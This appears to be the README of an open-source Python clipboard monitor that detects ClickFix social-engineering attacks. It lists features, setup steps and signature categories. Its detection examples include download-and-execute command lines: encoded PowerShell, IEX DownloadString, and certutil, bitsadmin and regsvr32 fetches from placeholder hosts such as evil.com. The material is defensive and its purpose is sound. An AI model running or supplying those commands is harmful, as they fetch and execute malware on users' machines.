🛡️ Clipboard Security Monitor

Real-time protection against ClickFix attacks and malicious clipboard content

🚨 What is ClickFix?

ClickFix is a dangerous social engineering attack that manipulates your clipboard to execute malicious code. When you copy what appears to be legitimate text (like a CAPTCHA solution or error fix), the website secretly replaces your clipboard content with harmful PowerShell scripts, batch commands, or other malicious code. When you paste and execute it, you unknowingly install malware on your system.

This tool provides real-time protection against such attacks.

✨ Features

🔍 Real-Time Clipboard Monitoring

• Continuously monitors your clipboard for changes
• Instant detection of malicious content
• Automatic threat analysis and alerts

🎯 Advanced Threat Detection

• PowerShell attacks: Encoded commands, execution policy bypass, remote downloads
• CMD/Batch exploits: Certutil abuse, BITS jobs, regsvr32 tricks
• JavaScript injections: Eval functions, malicious scripts
• URL-based threats: Suspicious shortened links, malware download URLs
• Encoding attacks: Base64 payloads, hex-encoded malware

🖥️ User-Friendly Interface

• Clean, intuitive GUI built with Tkinter
• Real-time clipboard content display
• Detailed threat analysis with explanations
• One-click malicious content removal

🔧 Customizable Protection

• JSON-based signature system
• Easy-to-edit detection patterns
• Add custom rules for emerging threats
• Import/export signature sets

📊 Activity Logging

• Comprehensive threat detection logs
• Timestamp and content tracking
• Export logs for security analysis

🎭 System Tray Integration

• Minimize to system tray for background protection
• Instant threat notifications
• Right-click menu for quick actions
• Silent monitoring mode

🚀 Quick Start

Prerequisites

pip install pyperclip

Optional (for system tray support):

pip install pystray Pillow

Run the Tool

python clipboard_monitor.py

Create Standalone Executable

pip install pyinstaller
pyinstaller --onefile --windowed clipboard_monitor.py

📱 Usage

1. Launch the application
2. Monitor - Tool automatically starts monitoring your clipboard
3. Protection - Get instant alerts when malicious content is detected
4. Action - Choose to clear dangerous content or review details
5. Background - Minimize to tray for continuous protection

🎯 What Gets Detected?

PowerShell Threats

# Examples of detected patterns:
powershell.exe -encodedcommand [base64]
IEX (New-Object Net.WebClient).DownloadString('...')
Invoke-Expression $(...) 

Command Line Attacks

# Examples of detected patterns:
certutil -urlcache -split -f http://malware.com/file.exe
bitsadmin /transfer /download http://evil.com/malware.exe
regsvr32 /s /n /u /i:http://malware.com/script.sct scrobj.dll

Suspicious URLs

• Shortened URLs (bit.ly, tinyurl.com, t.co)
• Direct executable downloads
• Suspicious domains and file extensions

🛠️ Configuration

Custom Signatures

Edit clipboard_signatures.json to add your own detection patterns:

{
  "custom_patterns": [
    "your_regex_pattern_here",
    "another_suspicious_pattern"
  ]
}

Signature Categories

• powershell_commands: PowerShell-based attacks
• cmd_commands: Command prompt exploits
• script_patterns: JavaScript/VBScript injections
• suspicious_urls: Malicious or suspicious URLs
• encoding_patterns: Base64, hex, and other encoding attacks

🔒 Privacy & Security

✅ 100% Offline - No network connections or data transmission
✅ Local Analysis - All threat detection happens on your machine
✅ No Telemetry - Your clipboard content never leaves your computer
✅ Open Source - Full transparency, audit the code yourself
✅ Zero Dependencies - Core functionality works with Python standard library

📸 Screenshots

Main Interface

*Clean, professional interface showing real-time clipboard monitoring and threat analysis*

System Tray Integration

Background protection with instant notifications when threats are detected

Threat Detection

*Detailed analysis showing exactly what malicious patterns were found*

🔧 System Requirements

• Python: 3.6 or higher
• OS: Windows, macOS, or Linux
• RAM: ~50MB
• Dependencies:
  • pyperclip (clipboard access)
  • pystray + Pillow (optional, for system tray)

🤝 Contributing

We welcome contributions! Here's how you can help:

1. Report Threats: Found a new ClickFix variant? Open an issue!
2. Add Signatures: Submit new detection patterns via pull request
3. Improve Code: Bug fixes, performance improvements, new features
4. Documentation: Help improve docs and examples

Adding New Signatures

# Format for new signature patterns
"new_threat_category": [
    r"regex_pattern_for_detection",
    r"another_pattern_variant"
]

📝 License

This project is licensed under the MIT License - see the LICENSE file for details.

⚠️ Disclaimer

This tool is designed to help protect against clipboard-based attacks but should be used as part of a comprehensive security strategy. Always keep your system updated and use reputable antivirus software alongside this tool.

🙏 Acknowledgments

• Inspired by research on ClickFix attack vectors
• Built to protect users from social engineering attacks
• Community-driven signature database

📞 Support

• Issues: Report bugs or request features via GitHub Issues
• Security: For security vulnerabilities, please email privately
• Updates: Watch this repository for the latest threat signatures

---

Stay Safe! 🛡️ Your clipboard is more dangerous than you think.